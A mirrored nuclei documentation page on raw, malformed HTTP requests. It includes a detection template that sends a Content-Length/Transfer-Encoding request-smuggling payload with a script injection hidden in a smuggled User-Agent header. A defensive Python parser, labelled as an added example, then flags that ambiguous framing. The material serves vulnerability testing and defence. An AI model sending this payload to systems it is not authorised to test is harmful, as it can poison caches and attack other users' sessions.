mirror of
https://github.com/projectdiscovery/nuclei.git
synced 2025-12-19 19:25:23 +00:00
39 lines
1.1 KiB
Plaintext
---
title: "Unsafe HTTP Requests"
---

Nuclei supports [rawhttp](https://github.com/projectdiscovery/rawhttp) for complete control over and customization of the request, allowing **any kind of malformed request** for testing issues like HTTP request smuggling, Host header injection, CRLF with malformed characters, and more.

The **rawhttp** library is disabled by default and can be enabled by including `unsafe: true` in the request block.

Here is an example of an HTTP request smuggling detection template using `rawhttp`.

```yaml
http:
  - raw:
      # Request 1: carries both Content-Length and Transfer-Encoding: chunked,
      # with a second request placed after the terminating 0 chunk.
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 150
        Transfer-Encoding: chunked

        0

        GET /post?postId=5 HTTP/1.1
        User-Agent: a"/><script>alert(1)</script>
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 5

        x=1
      # Request 2: an ordinary follow-up request to the same path.
      - |+
        GET /post?postId=5 HTTP/1.1
        Host: {{Hostname}}

    unsafe: true # Enables rawhttp client
    # Matches when the User-Agent marker from request 1 appears in a response body.
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<script>alert(1)</script>")'
```
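Seen from the receiving side, the first request in the template is ambiguous because a parser that honours `Content-Length` and one that honours `Transfer-Encoding: chunked` disagree on where the body ends. The following is an added example, not part of the nuclei documentation: it shows the check a proxy or server can apply to reject such framing, using a constructed copy of that request with the placeholder host `target.example`; the function names are hypothetical.

```python
CRLF = b"\r\n"
# Constructed sample: first request of the template on this page, with
# {{Hostname}} replaced by the placeholder host target.example.
SAMPLE = b"""POST / HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked

0

GET /post?postId=5 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

x=1""".replace(b"\n", CRLF)

def parse_head(raw):
    """Split at the blank line; return ({lowercased name: [values]}, body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body

def chunked_end(body):
    """Offset just past the zero-size chunk (trailers unsupported), else -1."""
    pos = 0
    while (eol := body.find(CRLF, pos)) >= 0:
        try:
            size = int(body[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        except ValueError:
            return -1
        if size == 0:
            return eol + 4 if body[eol:eol + 4] == CRLF + CRLF else -1
        pos = eol + 2 + size + 2  # size line CRLF, chunk data, data CRLF
    return -1

def framing_report(raw):
    """Return (ambiguous, bytes a chunked parser leaves for the next request)."""
    headers, body = parse_head(raw)
    lengths = headers.get(b"content-length", [])
    chunked = any(b"chunked" in v.lower() for v in headers.get(b"transfer-encoding", []))
    end = chunked_end(body) if chunked else -1
    # Both framing headers, or conflicting Content-Length values: reject.
    ambiguous = (bool(lengths) and chunked) or len(set(lengths)) > 1
    return ambiguous, (body[end:] if end >= 0 else b"")
```

`framing_report(SAMPLE)` flags the request as ambiguous and returns the embedded `GET /post?postId=5` request as the bytes a chunked parser would carry over to the next request on the connection.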